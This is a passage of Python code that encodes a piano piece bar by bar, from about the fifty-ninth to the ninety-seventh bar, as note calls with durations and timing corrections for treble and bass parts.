self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a4(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a5(1)
# -------- fifty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- sixtieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.e7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.c7(2)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a4(1)
self.sc.a5(1)
self.sc.e5(1)
self.sc.a5(1)
# -------- sixty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- sixty-second bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- sixty-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-fourth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- sixty-fifth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-sixth bar -------- #
# ---- major ---- #
self.sc.c6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e7(0.5)
self.sc.c7(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.modify_time(2, 1)
self.sc.a7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.b5(0.5)
self.sc.e4(0.5)
self.sc.b4(0.5)
self.sc.d5(0.5)
# -------- sixty-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- sixty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- sixty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- seventy-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventy-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.c6(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.b4(0.5)
self.sc.a5(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
# -------- seventy-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.e5(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.e5(0.5)
self.sc.b4(0.5)
self.sc.b5(0.5)
self.sc.b4(0.5)
# -------- seventy-fourth bar -------- #
# ---- major ---- #
self.sc.c6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.c7(0.5)
self.sc.e7(0.5)
self.sc.c7(6)
self.sc.modify_time(6, 1)
self.sc.e7(6)
self.sc.modify_time(6, 1)
self.sc.a7(6)
# ---- time correct ---- #
self.sc.modify_time(12, 1)
# ---- minor ---- #
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.a5(0.5)
self.sc.g4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.a3(6)
# -------- seventy-fifth bar -------- #
# ---- major ---- #
self.sc.modify_time(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.g6s(0.5)
# ---- time correct ---- #
self.sc.modify_time(2, 1)
# ---- minor ---- #
self.sc.g3s(2)
self.sc.modify_time(2, 1)
self.sc.g4s(2)
# -------- seventy-sixth bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.b5(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.b4(0.5)
self.sc.g5(0.5)
self.sc.g4(0.5)
self.sc.e3(0.5)
self.sc.e4(0.5)
# -------- seventy-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.g5(0.5)
self.sc.c4(0.5)
self.sc.e4(0.5)
self.sc.g4(0.5)
self.sc.c5(0.5)
self.sc.g4(0.5)
self.sc.e4(0.5)
self.sc.c4(0.5)
# -------- seventy-eighth bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(0.5)
self.sc.d5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.d3(0.5)
self.sc.d4(0.5)
self.sc.f4(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.c4(0.5)
self.sc.a2(0.5)
self.sc.a3(0.5)
self.sc.e3(0.5)
self.sc.c4(0.5)
# -------- seventy-ninth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b5(1)
self.sc.b4(1)
self.sc.e3(1)
self.sc.e4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- eightieth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- eighty-first bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.c4(1)
self.sc.g3(1)
# -------- eighty-second bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- eighty-third bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.b4(1)
# -------- eighty-fourth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(1)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.c7(2)
self.sc.e3(0.5)
self.sc.b3(0.5)
self.sc.c4(1)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.g6(1)
# -------- eighty-fifth bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d5(0.5)
self.sc.a5(0.5)
self.sc.d6(1)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.c7(2)
self.sc.e3(0.5)
self.sc.b3(0.5)
self.sc.e4(1)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.g6(2)
# -------- eighty-sixth bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.d5(0.5)
self.sc.a4(0.5)
self.sc.f4(0.5)
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
# -------- eighty-seventh bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.modify_time(2, 1)
self.sc.d4(2)
self.sc.modify_time(2)
self.sc.e4(1)
self.sc.b3(1)
self.sc.g3(2)
self.sc.modify_time(4, 1)
self.sc.e5(1)
self.sc.b4(1)
self.sc.g4(2)
# -------- eighty-eighth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- eighty-ninth bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.c4(1)
self.sc.g3(1)
# -------- ninetieth bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- ninety-first bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(3)
self.sc.e5(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.e4(1)
# -------- ninety-second bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- ninety-third bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.a5(1)
self.sc.b5(2)
self.sc.modify_time(2)
# -------- ninety-fourth bar -------- #
# ---- major ---- #
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(1)
self.sc.modify_time(1.5, 1)
self.sc.d7(0.5)
self.sc.c7(1)
self.sc.modify_time(1, 1)
self.sc.e7(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(2)
self.sc.modify_time(2)
# -------- ninety-fifth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# -------- ninety-sixth bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
self.sc.d6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g5(1)
self.sc.a5(2)
self.sc.modify_time(2)
# -------- ninety-seventh bar -------- #
# ---- major ---- #
self.sc.e6(1)
self.sc.d6(1)
self.sc.a6(1)
self.sc.d6(1)
self.sc.e6(1)
self.sc.d6(1)
self.sc.a5(1)
